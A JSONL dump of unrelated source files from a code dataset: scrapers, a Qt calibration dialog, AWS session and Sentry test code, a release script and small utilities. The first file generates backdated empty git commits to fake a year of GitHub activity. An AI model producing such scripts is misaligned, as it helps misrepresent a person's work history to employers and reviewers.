{"seq_id":"420152179","text":"# This file will write a shell script to fill your github history.\n\nfrom random import randint\nfrom datetime import datetime, timedelta\n\ndef main():\n print('Maximum number of daily commits:')\n maxCommits = input('> ')\n print('Github username:')\n user = input('> ')\n print('Repository:')\n repo = input('> ')\n outFile.truncate()\n write('#!/bin/bash')\n write('REPO='+repo)\n write('USER='+user)\n write('git init $REPO')\n write('cd $REPO')\n write('touch README.md')\n write('git add README.md')\n date = get_init_date()\n while (date.date() != datetime.today().date()):\n dailyWork = randint(0, int(maxCommits))\n for num in range(0, dailyWork):\n write(commit_template(date))\n date += timedelta(days=1)\n\n write('git remote add origin git@github.com:$USER/$REPO.git')\n write('git pull')\n write('git push -u origin master')\n outFile.close()\n\ndef write(s):\n outFile.write(s + '\\n')\n\ndef get_init_date():\n today = datetime.today()\n date = datetime(today.year - 1, today.month, today.day, 12)\n weekday = datetime.weekday(date)\n\n while weekday < 6:\n date = date + timedelta(-1)\n weekday = datetime.weekday(date)\n\n return date\n\ndef commit_template(date):\n template = (\n '''GIT_AUTHOR_DATE={0} GIT_COMMITTER_DATE={1} '''\n '''git commit --allow-empty -m \"faking it since day 1\" > /dev/null\\n'''\n )\n return template.format(date.isoformat(), date.isoformat())\n\noutFile = open('fillit.sh', 'w')\nmain()\n","sub_path":"Contribs.py","file_name":"Contribs.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"465478215","text":"# -*- coding: utf-8 -*-\nimport os\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\nfrom datetime import datetime, timedelta\nfrom data2html import data2html\n\n\nclass Hedgehog(object):\n\n \"\"\"Base report-generation class; all report generators can inherit from it\"\"\"\n\n def __init__(self, opt, report_type):\n \"\"\"opt is the sys.argv of the script doing the initialization\"\"\"\n report_date = None if len(opt) == 1 else opt[1]\n if report_date is None:\n self.tmp_date = datetime.now() - timedelta(days=1)\n else:\n self.tmp_date = datetime.strptime(report_date, \"%Y%m%d\")\n self.report_type = report_type\n self.date = self.tmp_date.strftime('%Y%m%d')\n self.hedge_dir = os.path.split(os.getcwd())[0]\n\n def get_date_before(self, date_num):\n \"\"\"Get the date date_num days before the report date\"\"\"\n return (self.tmp_date - timedelta(days=date_num)).strftime('%Y%m%d')\n\n def get_date_list(self, 
date_num):\n \"\"\"Get the list of the past date_num dates, starting from the report date\"\"\"\n date_list = []\n for i in range(0, date_num):\n date_i = (self.tmp_date - timedelta(days=i)).strftime('%Y%m%d')\n date_list.append(date_i)\n return date_list\n\n def data2html(self, data_list, template_name):\n html = data2html.data2html(\n self.date,\n data_list,\n os.path.join(self.hedge_dir, 'template'),\n template_name)\n return html\n\n def html2file(self, html):\n fileobject = open(\n os.path.join(self.hedge_dir, 'report', '%s_report.html' % self.report_type), 'w')\n fileobject.write(\"%s\" % html)\n","sub_path":"Hedgehog.py","file_name":"Hedgehog.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"109892021","text":"# -*- coding: utf-8 -*-\n\"\"\"\nbrickv (Brick Viewer)\nCopyright (C) 2011-2012 Olaf Lüke \nCopyright (C) 2012 Bastian Nordmeyer \nCopyright (C) 2012, 2014-2015 Matthias Bolte \n\nadvanced.py: GUI for advanced features\n\nThis program is free software; you can redistribute it and/or\nmodify it under the terms of the GNU General Public License\nas published by the Free Software Foundation; either version 2\nof the License, or (at your option) any later version.\n\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\nGeneral Public License for more details.\n\nYou should have received a copy of the GNU General Public\nLicense along with this program; if not, write to the\nFree Software Foundation, Inc., 59 Temple Place - Suite 330,\nBoston, MA 02111-1307, USA.\n\"\"\"\n\nfrom brickv.ui_advanced import Ui_Advanced\n\nfrom PyQt4.QtCore import Qt, QTimer\nfrom PyQt4.QtGui import QDialog\n\nfrom brickv import infos\n\nNO_BRICK = 'No Brick found'\n\nclass AdvancedWindow(QDialog, Ui_Advanced):\n def __init__(self, parent):\n QDialog.__init__(self, parent)\n\n self.setupUi(self)\n\n self.button_calibrate.setEnabled(False)\n\n self.brick_infos = []\n\n self.parent = parent\n self.button_calibrate.clicked.connect(self.calibrate_clicked)\n self.combo_brick.currentIndexChanged.connect(self.brick_changed)\n self.check_enable_calibration.stateChanged.connect(self.enable_calibration_changed)\n\n infos.get_infos_changed_signal().connect(self.update_bricks)\n\n self.update_bricks()\n\n def update_bricks(self):\n self.brick_infos = []\n self.combo_brick.clear()\n\n for info in infos.get_brick_infos():\n self.brick_infos.append(info)\n self.combo_brick.addItem(info.get_combo_item())\n\n if self.combo_brick.count() == 0:\n self.combo_brick.addItem(NO_BRICK)\n\n self.update_calibration()\n self.update_ui_state()\n\n def calibrate_clicked(self):\n port_names = ['a', 'b', 'c', 'd']\n\n self.parent.ipcon.adc_calibrate(self.current_device(),\n port_names[self.combo_port.currentIndex()])\n\n self.update_calibration()\n\n def current_device(self):\n try:\n return self.brick_infos[self.combo_brick.currentIndex()].plugin.device\n except:\n return None\n\n def update_calibration(self):\n device = self.current_device()\n\n if device is None or self.combo_port.count() == 0:\n self.label_offset.setText('-')\n self.label_gain.setText('-')\n else:\n def slot():\n offset, gain = self.parent.ipcon.get_adc_calibration(device)\n self.label_offset.setText(str(offset))\n self.label_gain.setText(str(gain))\n QTimer.singleShot(0, slot)\n\n def brick_changed(self, index):\n self.combo_port.clear()\n\n if 
self.combo_brick.currentIndex() < 0 or len(self.brick_infos) == 0:\n self.combo_port.addItems(['A', 'B', 'C', 'D'])\n return\n\n info = self.brick_infos[index]\n\n for key in sorted(info.bricklets.keys()):\n if info.bricklets[key] is None:\n self.combo_port.addItem(key.upper())\n else:\n self.combo_port.addItem('{0}: {1}'.format(key.upper(), info.bricklets[key].get_combo_item()))\n\n self.update_ui_state()\n self.update_calibration()\n\n if self.combo_port.count() == 0:\n self.check_enable_calibration.setChecked(False)\n\n def enable_calibration_changed(self, state):\n self.button_calibrate.setEnabled(state == Qt.Checked)\n\n def update_ui_state(self):\n enabled = len(self.brick_infos) > 0\n\n self.combo_brick.setEnabled(enabled)\n self.check_enable_calibration.setEnabled(enabled and self.combo_port.count() > 0)\n self.button_calibrate.setEnabled(enabled and self.combo_port.count() > 0 and self.check_enable_calibration.isChecked())\n","sub_path":"src/brickv/advanced.py","file_name":"advanced.py","file_ext":"py","file_size_in_byte":4184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"610870242","text":"import argparse\n\nfrom src.layers import LaPool\nfrom src.models.poolers import SimplePooler\nfrom src.spectral_similarity.training import (results_to_file,\n run_experiment)\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--name\", type=str, default=\"Grid2d\")\nparser.add_argument(\"--lr\", type=float, default=1e-2)\nparser.add_argument(\"--patience\", type=int, default=50)\nparser.add_argument(\"--tol\", type=float, default=1e-6)\nparser.add_argument(\"--runs\", type=int, default=3)\nargs = parser.parse_args()\n\n\ndef create_model(**kwargs):\n pool = LaPool(shortest_path_reg=False, return_sel=True)\n model = SimplePooler(pool)\n\n return model\n\n\nresults = run_experiment(\n name=args.name,\n method=\"LaPool\",\n create_model=create_model,\n learning_rate=args.lr,\n es_patience=args.patience,\n es_tol=args.tol,\n runs=args.runs,\n)\nresults_to_file(args.name, \"LaPool\", *results)\n","sub_path":"src/spectral_similarity/run_lapool.py","file_name":"run_lapool.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"252765939","text":"\"\"\"setuptools command to prepare FiPy for release\"\"\"\nfrom __future__ import unicode_literals\n\nfrom distutils.core import Command\nimport glob\nimport os\nimport shutil\n\nfrom setuptools.sandbox import run_setup\nfrom future.utils import text_to_native_str\n\nfrom ._nativize import nativize_all\n\n__all__ = [text_to_native_str(\"release\")]\n\n\nclass release(Command):\n \"\"\"Prepare FiPy for release\n\n Generates tarball and excutable Windows installer\"\"\"\n\n description = \"Prepare the FiPy release artifacts\"\n\n # List of option tuples: long name, short name (None if no short\n # name), and help string.\n user_options = [('unix', None, \"create a tarball source distribution\"),\n ('windows', None, \"create an executable installer for MS Windows\"),\n ('all', None, \"create unix and Windows distributions\"),\n ]\n user_options = [nativize_all(u) for u in user_options]\n\n def initialize_options(self):\n self.unix = 0\n self.windows = 0\n self.all = 0\n\n def finalize_options(self):\n if self.all:\n self.unix = 1\n self.windows = 1\n\n def _remove_manifest(self):\n \"\"\"Remove MANIFEST file\n\n probably no longer needed, MANIFEST was ancient history?\"\"\"\n\n try:\n 
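# Editor's hedged aside (not part of the original): the try/except below is the
# py2/py3-portable EAFP idiom for "delete the file if it exists". On Python 3
# only, an equivalent could use contextlib, or pathlib on 3.8+:
#     from contextlib import suppress
#     with suppress(OSError):
#         os.remove("MANIFEST")
#     # or: pathlib.Path("MANIFEST").unlink(missing_ok=True)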
os.remove(\"MANIFEST\")\n except OSError as _:\n pass\n\n def _build_unix_distribution(self):\n \"\"\"Create Unix source distribution\"\"\"\n\n self._remove_manifest()\n shutil.copyfile(\"MANIFEST-UNIX.in\", \"MANIFEST.in\")\n run_setup(\"setup.py\", [\"sdist\"])\n os.remove(\"MANIFEST.in\")\n\n def _build_windows_distribution(self):\n \"\"\"Create Windows source distribution\n\n Contains executable installer and examples\"\"\"\n\n import versioneer\n\n version = versioneer.get_version()\n\n self._remove_manifest()\n run_setup(\"setup.py\", [\"bdist_wininst\"])\n\n self._remove_manifest()\n\n shutil.copyfile(\"MANIFEST-WINDOWS.in\", \"MANIFEST.in\")\n run_setup(\"setup.py\", [text_to_native_str(s) for s in [\"sdist\", \"--dist-dir=dist-windows\", \"--formats=zip\"]])\n shutil.move(\n os.path.join(\"dist-windows\", \"FiPy-{}.zip\".format(version)),\n os.path.join(\"dist\", \"FiPy-{}.win32.zip\".format(version)),\n )\n os.rmdir(\"dist-windows\")\n os.remove(\"MANIFEST.in\")\n\n def run(self):\n if self.unix:\n self._build_unix_distribution()\n if self.windows:\n self._build_windows_distribution()\n","sub_path":"_setup/release.py","file_name":"release.py","file_ext":"py","file_size_in_byte":2527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"379445830","text":"import unittest\nimport hashlib\nfrom mock import patch\nfrom superlance.compat import StringIO\nfrom superlance.sentryreporter import SentryReporter\n\n\nclass SentryReporterTests(unittest.TestCase):\n\n def test_ignore_event(self):\n reporter = SentryReporter(sentry_dsn=None, stderr_lines=10, stdout_lines=10)\n exit_event_headers = {'eventname': 'PROCESS_STATE_EXITED'}\n fatal_event_headers = {'eventname': 'PROCESS_STATE_FATAL'}\n stop_event_headers = {'eventname': 'PROCESS_STATE_STOPPED'}\n\n # should ignore crash when it's expected\n self.assertTrue(\n reporter.ignore_event(\n headers=exit_event_headers,\n pheaders={'expected': 1},\n event_type='crash'),\n 'expected crash')\n\n # should ignore if event is not exit\n self.assertTrue(\n reporter.ignore_event(\n headers=stop_event_headers,\n pheaders={'expected': 0},\n event_type='crash'),\n 'unexpected stop')\n\n # should not ignore crash when it's not expected\n self.assertFalse(\n reporter.ignore_event(\n headers=exit_event_headers,\n pheaders={'expected': 0},\n event_type='crash'),\n 'unexpected crash')\n\n # should ignore fatal if event is not exit\n self.assertTrue(\n reporter.ignore_event(\n headers=exit_event_headers,\n pheaders={},\n event_type='fatal'),\n 'exit + fatal')\n\n # should not ignore fatal if event is an exit\n self.assertFalse(\n reporter.ignore_event(\n headers=fatal_event_headers,\n pheaders={},\n event_type='fatal'),\n 'fatal error')\n\n def test_get_event_details(self):\n reporter = SentryReporter(sentry_dsn=None, stderr_lines=10, stdout_lines=10)\n reporter.stdin = StringIO()\n reporter.stdout = StringIO()\n\n reporter.stdin.write('ver:3.0 len:69 eventname:PROCESS_STATE_EXITED\\n')\n reporter.stdin.write('processname:proc groupname:grp from_state:RUNNING expected:0 pid:123\\n')\n reporter.stdin.seek(0)\n\n event_details = reporter.get_event_details('crash')\n\n expected_pheaders = {\n 'processname': 'proc',\n 'groupname': 'grp',\n 'from_state': 'RUNNING',\n 'expected': '0',\n 'pid': '123',\n }\n expected_ignore = False\n self.assertEqual(event_details, (expected_pheaders, expected_ignore))\n\n def test_notify_sentry(self):\n reporter = SentryReporter(sentry_dsn=None, stderr_lines=10, stdout_lines=10)\n 
msg_header = 'boom header'\n stdout = 'out-BOOM!!!'\n stderr = '''\\\n w.buildFinished(name, s, results)\n File \"/usr/local/lib/python2.7/dist-packages/buildbot/status/mail.py\", line 455, in buildFinished\n return self.buildMessage(name, [build], results)\n File \"/usr/local/lib/python2.7/dist-packages/buildbot/status/mail.py\", line 679, in buildMessage\n build=build, results=build.results)\n File \"/usr/local/lib/python2.7/dist-packages/buildbot/status/mail.py\", line 659, in buildMessageDict\n self.master_status)\n File \"/opt/buildbot/master/jobs/__init__.py\", line 425, in custom_mail_message\n details=build_url,\nexceptions.UnicodeEncodeError: 'ascii' codec can't encode character u'\\u2026' in position 127: ordinal not in range(128)'\n'''\n stderr_body = '\\n'.join(stderr.splitlines()[:-1])\n stderr_last_line = stderr.splitlines()[-1]\n\n md5 = hashlib.md5(stderr_body + stdout).hexdigest()\n\n with patch('superlance.sentryreporter.raven') as raven_mock:\n reporter.notify_sentry(msg_header, stderr, stdout, 'crash')\n\n raven_mock.Client().captureMessage.assert_called_with(\n 'Supervisor CRASH: {}'.format(md5),\n data={'logger': 'superlance'},\n extra={\n 'header': msg_header,\n 'stdout': stdout,\n 'stderr': stderr_body,\n 'stderr_last_line': stderr_last_line,\n },\n )\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"superlance/tests/sentryreporter_test.py","file_name":"sentryreporter_test.py","file_ext":"py","file_size_in_byte":4260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"613426525","text":"# -*- coding: utf-8 -*-\n\"\"\"\nThis class essentially overrides the boto3 session init, passing in\nan async botocore session\n\"\"\"\n\n\nimport aiobotocore.session\n\nimport boto3.session\nimport boto3.resources.base\nimport boto3.utils\n\nfrom aioboto3.resources import AIOBoto3ResourceFactory\n\n\nclass Session(boto3.session.Session):\n \"\"\"\n A session stores configuration state and allows you to create service\n clients and resources.\n\n :type aws_access_key_id: string\n :param aws_access_key_id: AWS access key ID\n :type aws_secret_access_key: string\n :param aws_secret_access_key: AWS secret access key\n :type aws_session_token: string\n :param aws_session_token: AWS temporary session token\n :type region_name: string\n :param region_name: Default region when creating new connections\n :type botocore_session: botocore.session.Session\n :param botocore_session: Use this Botocore session instead of creating\n a new default one.\n :type profile_name: string\n :param profile_name: The name of a profile to use. 
If not given, then\n the default profile is used.\n \"\"\"\n def __init__(self, aws_access_key_id=None, aws_secret_access_key=None,\n aws_session_token=None, region_name=None,\n botocore_session=None, profile_name=None, loop=None):\n if botocore_session is not None:\n self._session = botocore_session\n else:\n # Create a new default session\n self._session = aiobotocore.session.get_session(loop=loop)\n\n # Setup custom user-agent string if it isn't already customized\n if self._session.user_agent_name == 'Botocore':\n botocore_info = 'Botocore/{0}'.format(\n self._session.user_agent_version)\n if self._session.user_agent_extra:\n self._session.user_agent_extra += ' ' + botocore_info\n else:\n self._session.user_agent_extra = botocore_info\n self._session.user_agent_name = 'Boto3'\n self._session.user_agent_version = boto3.__version__\n\n if profile_name is not None:\n self._session.set_config_variable('profile', profile_name)\n\n if aws_access_key_id or aws_secret_access_key or aws_session_token:\n self._session.set_credentials(\n aws_access_key_id, aws_secret_access_key, aws_session_token)\n\n if region_name is not None:\n self._session.set_config_variable('region', region_name)\n\n self.resource_factory = AIOBoto3ResourceFactory(\n self._session.get_component('event_emitter'))\n self._setup_loader()\n self._register_default_handlers()\n\n def _register_default_handlers(self):\n\n # S3 customizations\n self._session.register(\n 'creating-client-class.s3',\n boto3.utils.lazy_call(\n 'aioboto3.s3.inject.inject_s3_transfer_methods'))\n self._session.register(\n 'creating-resource-class.s3.Bucket',\n boto3.utils.lazy_call(\n 'boto3.s3.inject.inject_bucket_methods'))\n self._session.register(\n 'creating-resource-class.s3.Object',\n boto3.utils.lazy_call(\n 'boto3.s3.inject.inject_object_methods'))\n self._session.register(\n 'creating-resource-class.s3.ObjectSummary',\n boto3.utils.lazy_call(\n 'boto3.s3.inject.inject_object_summary_methods'))\n\n # DynamoDb customizations\n self._session.register(\n 'creating-resource-class.dynamodb',\n boto3.utils.lazy_call(\n 'boto3.dynamodb.transform.register_high_level_interface'),\n unique_id='high-level-dynamodb')\n self._session.register(\n 'creating-resource-class.dynamodb.Table',\n boto3.utils.lazy_call(\n 'aioboto3.dynamodb.table.register_table_methods'),\n unique_id='high-level-dynamodb-table')\n\n # EC2 Customizations\n self._session.register(\n 'creating-resource-class.ec2.ServiceResource',\n boto3.utils.lazy_call(\n 'boto3.ec2.createtags.inject_create_tags'))\n\n self._session.register(\n 'creating-resource-class.ec2.Instance',\n boto3.utils.lazy_call(\n 'boto3.ec2.deletetags.inject_delete_tags',\n event_emitter=self.events))\n\n def resource(self, *args, **kwargs):\n result = super(Session, self).resource(*args, **kwargs)\n\n return result\n","sub_path":"aioboto3/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":4568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"87502883","text":"import numpy as np\nimport cv2\n\nrgb_lower_orange = np.uint8([[[255, 215, 0]]])\nrgb_higher_orange = np.uint8([[[255, 140, 0]]])\n\nhsv_lower_orange = cv2.cvtColor(rgb_lower_orange , cv2.COLOR_BGR2HSV)\nhsv_higher_orange = cv2.cvtColor(rgb_higher_orange, cv2.COLOR_BGR2HSV)\n\nmy_video = cv2.VideoCapture(0)\n\nwhile(True):\n ret, frame = my_video.read()\n converted_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n\n mask = cv2.inRange(converted_frame, hsv_lower_orange, 
hsv_higher_orange)\n\n res = cv2.bitwise_and(frame, frame, mask=mask)\n\n\n cv2.imshow('frame', frame)\n cv2.imshow('mask', mask)\n cv2.imshow('res', res)\n \n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\nmy_video.release()\ncv2.destroyAllWindows()\n","sub_path":"examples/videos/tracking.py","file_name":"tracking.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"261733097","text":"# coding=utf-8\n\"\"\"\nRobot: triggers the main() of a specified module via messages\n\"\"\"\nimport time\nimport importlib\nimport threading\nfrom common.bus import Bus\nlock = threading.Lock()\ninited = set([])\n\n\ndef main(config):\n global lock\n global inited\n module_name = config['module']\n # id = config.get('id')\n module = importlib.import_module(module_name)\n functions = dir(module)\n if 'init' in functions:\n if '_inited_' not in functions:\n try:\n lock.acquire()\n if module_name not in inited:\n module.init(**config)\n inited.add(module_name)\n finally:\n module._inited_ = True\n lock.release()\n msg_in = config.get('in', None)\n msg_out = config.get('out', None)\n if 'main' not in functions:\n time.sleep(10.0)\n return True\n if not msg_in and not msg_out:\n module.main()\n return False\n if msg_out and isinstance(msg_out, str):\n msg_out = [msg_out]\n while True:\n data = True\n while data:\n val = Bus.recv(msg_in) or None\n if val is not None:\n r = module.main(*val)\n if msg_out and r is not None:\n for o in msg_out:\n Bus.send(o, r)\n else:\n data = False\n","sub_path":"src/workers/hpss_proxy_robot.py","file_name":"hpss_proxy_robot.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"120509089","text":"import requests\nimport re\nfrom bs4 import BeautifulSoup\nfrom replacements import current_id_replacements, verse_replacements, synonyms_replacements, translation_replacements, purport_replacements\nfrom pathlib import Path\n\n\ndef parser():\n url = f'https://vanisource.org/wiki/SB_1.1.{_index}'\n\n _source = requests.get(url)\n\n soup = BeautifulSoup(_source.content, 'html.parser')\n\n b_tags = soup.find_all(\"b\")\n\n headers = str(b_tags[len(b_tags)-1])\n headers = headers.replace('<b>', '')\n headers = headers.replace('</b>', '')\n headers = list(headers.split('-'))\n \n pointers = []\n for header in headers:\n head = list(list(header.split('>'))[1].split('<'))[0]\n pointers.append(head)\n \n # print(headers)\n # print(pointers)\n\n current_id = str(soup.find(\"h1\", {\"id\": \"firstHeading\"}))\n current_id = current_id_replacements(current_id)\n\n if _index==1:\n navigation = {\"current_id\": current_id, \"previous_id\": None, \"next_id\": pointers[0]}\n else:\n navigation = {\"current_id\": current_id, \"previous_id\": pointers[0], \"next_id\": pointers[1]}\n\n verse = str(soup.find(\"div\", {\"class\":\"verse\"}))\n verse = verse_replacements(verse)\n verse_entry = [{\"roman\": verse, \"isProse\": False}]\n\n synonyms = str(soup.find(\"div\", {\"class\": \"synonyms\"}))\n synonyms = synonyms_replacements(synonyms)\n\n translation = str(soup.find(\"div\", {\"class\":\"translation\"}))\n translation = translation_replacements(translation)\n\n purport = str(soup.find(\"div\", {\"class\": \"purport\"}))\n purport = purport_replacements(purport)\n purport_paras = list(filter(None, list(purport.split('\\n'))))\n purport_entry = [{\"type\": \"regular\", \"text\": para} for para in purport_paras]\n\n\n\n knowledge = {\"page_info\": 
navigation, \"verse\": verse_entry, \"synonyms\": synonyms, \"translation\": translation, \"purport\": purport_entry}\n\n\n print(knowledge)\n print(type(knowledge))\n\n if Path(f'/home/somit/Projects/web-scraping/SB/1/1/{_index}.json').is_file():\n with open(f'/home/somit/Projects/web-scraping/SB/1/1/{_index}.json', 'w') as json_file:\n print(knowledge, file=json_file)\n else:\n with open(f'/home/somit/Projects/web-scraping/SB/1/1/{_index}.json', 'x') as json_file:\n print(knowledge, file=json_file)\n\nfor _index in range(1,24):\n parser()","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"525141895","text":"\n#@@CALIBRE_COMPAT_CODE_START@@\nimport sys, os\n\n# Explicitly allow importing everything ...\nif os.path.dirname(os.path.dirname(os.path.abspath(__file__))) not in sys.path:\n sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nif os.path.dirname(os.path.abspath(__file__)) not in sys.path:\n sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)))\n\n# Bugfix for Calibre < 5:\nif \"calibre\" in sys.modules and sys.version_info[0] == 2:\n from calibre.utils.config import config_dir\n if os.path.join(config_dir, \"plugins\", \"DeDRM.zip\") not in sys.path:\n sys.path.insert(0, os.path.join(config_dir, \"plugins\", \"DeDRM.zip\"))\n\nif \"calibre\" in sys.modules:\n # Explicitly set the package identifier so we are allowed to import stuff ...\n __package__ = \"calibre_plugins.dedrm\"\n\n#@@CALIBRE_COMPAT_CODE_END@@\n","sub_path":"DeDRM_plugin/__calibre_compat_code.py","file_name":"__calibre_compat_code.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"509653355","text":"# Имеется файл с данными по успеваемости абитуриентов. 
Он представляет из себя \n# набор строк, где в каждой строке записана следующая информация:\n# Фамилия;Оценка_по_математике;Оценка_по_физике;Оценка_по_русскому_языку\n# Поля внутри строки разделены точкой с запятой, оценки — целые числа.\n# Напишите программу, которая считывает файл с подобной структурой и для \n# каждого абитуриента выводит его среднюю оценку по этим трём предметам на \n# отдельной строке, соответствующей этому абитуриенту.\n# Также в конце файла, на отдельной строке, через пробел запишите средние \n# баллы по математике, физике и русскому языку по всем абитуриентам:\n\ndef average_score(a,b,c):\n \"\"\"\n Вычисляем средний балл студента по трем дисциплинам\n \"\"\"\n return (int(a)+int(b)+int(c))/3\nwith open(\"students.txt\", \"r\") as my_file:\n str = my_file.read().splitlines()\n\nmath=physics=rus=0\nfor i in str:\n stud=i.split(';')\n print(average_score(stud[1], stud[2], stud[3]))\n math+=float(stud[1])\n physics+=float(stud[2])\n rus+=float(stud[3])\n\nprint(math/(len(str)), physics/(len(str)), rus/(len(str))) ","sub_path":"progrbasic/students.py","file_name":"students.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"225226870","text":"\n# Init Selenium test browser\nimport pandas as pd\nimport time\nfrom selenium import webdriver\nbrowser = webdriver.Chrome('./chromedriver')\nbrowser.get(\"https://en.midland.com.hk/find-property/#list\")\n\n\n\n# Scrap all information of a property given a detail page\ndef scrap_item_page():\n try:\n sell_price = browser.find_element_by_xpath(\"//div[@class='sect-sellrent']//p[@class='sell-color']\").text\n except:\n sell_price = \"\"\n\n try:\n rent_price = browser.find_element_by_xpath(\"//div[@class='sect-sellrent']//p[@class='rent-color']\").text\n except:\n rent_price = \"\"\n \n item_list = browser.find_elements_by_xpath(\"//li[@class='label-group']\")\n \n for item in item_list:\n item_text = item.text\n # saleable area\n if \"Saleable Area\" in item_text:\n net_area = item_text.split(\":\")[1].split(\"sq\")[0].replace(\" \",\"\")\n # gross area\n if \"Gross Area\" in item_text:\n gross_area = item_text.split(\":\")[1].split(\"sq\")[0].replace(\" \",\"\")\n # Efficiency Ratio\n if \"Efficiency Ratio\" in item_text:\n effi_ratio = item_text.split(\":\")[1].replace(\" \",\"\")\n # Layout\n if \"Layout\" in item_text:\n layout = item_text.split(\":\")[1].replace(\" \",\"\")\n # Orientation\n if \"Orientation\" in item_text:\n orit = item_text.split(\":\")[1].replace(\" \",\"\")\n # View\n if \"View\" in item_text:\n view = item_text.split(\":\")[1].replace(\" \",\"\")\n # Description\n if \"Description\" in item_text:\n desc = item_text.split(\":\")[1].replace(\" \",\"\")\n # Update date\n if \"Update Date\" in item_text:\n upd_dt = item_text.split(\":\")[1].replace(\" \",\"\")\n # Address\n if \"Address\" in item_text:\n addr = item_text.split(\":\")[1]\n # Number of Blocks\n if \"No. 
        # No. of Blocks\n        if \"No. of Blocks\" in item_text:\n            blk_num = item_text.split(\":\")[1].replace(\" \",\"\")\n        # Property School Net\n        if \"Property School Net\" in item_text:\n            school = item_text.split(\":\")[1]\n        # Total Flats\n        if \"Total Flats\" in item_text:\n            ttl_flt = item_text.split(\":\")[1].replace(\" \",\"\")\n        # Date of Occupation Permit\n        if \"Date of Occupation Permit\" in item_text:\n            occu_permit_dt = item_text.split(\":\")[1].replace(\" \",\"\")\n        # Facilities\n        if \"Facilities\" in item_text:\n            facilities = item_text.split(\":\")[1].replace(\" \",\"\")\n        # Property Value\n        if \"Property Value\" in item_text:\n            prop_val = item_text.split(\":\")[1].replace(\" \",\"\")\n        # Loan Amount\n        if \"Loan Amount\" in item_text:\n            ln_amt = item_text.split(\":\")[1].replace(\" \",\"\")\n        # Interest Rate\n        if \"Interest Rate\" in item_text:\n            int_rt = item_text.split(\":\")[1].replace(\" \",\"\")\n        # Repayment Period\n        if \"Repayment Period\" in item_text:\n            rpy_prd = item_text.split(\":\")[1].replace(\" \",\"\")\n        # Income Requirement\n        if \"Income Requirement\" in item_text:\n            inc_reqr = item_text.split(\":\")[1].replace(\" \",\"\")\n    \n    \n    # Check that every variable has been assigned; if not, assign \"\"\n    if \"sell_price\" not in locals():\n        sell_price = \"\"\n    if \"rent_price\" not in locals():\n        rent_price = \"\"\n    if \"net_area\" not in locals():\n        net_area = \"\"\n    if \"gross_area\" not in locals():\n        gross_area = \"\"\n    if \"effi_ratio\" not in locals():\n        effi_ratio = \"\"\n    if \"layout\" not in locals():\n        layout = \"\"\n    if \"orit\" not in locals():\n        orit = \"\"\n    if \"view\" not in locals():\n        view = \"\"\n    if \"desc\" not in locals():\n        desc = \"\"\n    if \"upd_dt\" not in locals():\n        upd_dt = \"\"  # (bug fix) upd_dt was missing from this ladder and could raise a NameError below\n    if \"addr\" not in locals():\n        addr = \"\"\n    if \"blk_num\" not in locals():\n        blk_num = \"\"\n    if \"school\" not in locals():\n        school = \"\"\n    if \"ttl_flt\" not in locals():\n        ttl_flt = \"\"\n    if \"occu_permit_dt\" not in locals():\n        occu_permit_dt = \"\"\n    if \"prop_val\" not in locals():\n        prop_val = \"\"\n    if \"facilities\" not in locals():\n        facilities = \"\"\n    if \"ln_amt\" not in locals():\n        ln_amt = \"\"\n    if \"int_rt\" not in locals():\n        int_rt = \"\"\n    if \"rpy_prd\" not in locals():\n        rpy_prd = \"\"\n    if \"inc_reqr\" not in locals():\n        inc_reqr = \"\"\n    \n    \n    info_dict = {\"sell_price\":sell_price\n                ,\"rent_price\":rent_price\n                ,\"net_area\":net_area\n                ,\"gross_area\":gross_area\n                ,\"effi_ratio\":effi_ratio\n                ,\"layout\":layout\n                ,\"orit\":orit\n                ,\"view\":view\n                ,\"desc\":desc\n                ,\"upd_dt\":upd_dt\n                ,\"addr\":addr\n                ,\"blk_num\":blk_num\n                ,\"school\":school\n                ,\"ttl_flt\":ttl_flt\n                ,\"occu_permit_dt\":occu_permit_dt\n                ,\"facilities\":facilities\n                ,\"prop_val\":prop_val\n                ,\"ln_amt\":ln_amt\n                ,\"int_rt\":int_rt\n                ,\"rpy_prd\":rpy_prd\n                ,\"inc_reqr\":inc_reqr\n                }\n    \n    return info_dict\n
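\n# (editor's sketch) the long `not in locals()` ladder above could be replaced by\n# collecting values into a dict and reading them back with defaults, e.g.:\n#   fields = {}\n#   key, _, value = item_text.partition(\":\")\n#   fields[key.strip()] = value.strip()\n#   net_area = fields.get(\"Saleable Area\", \"\")\n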
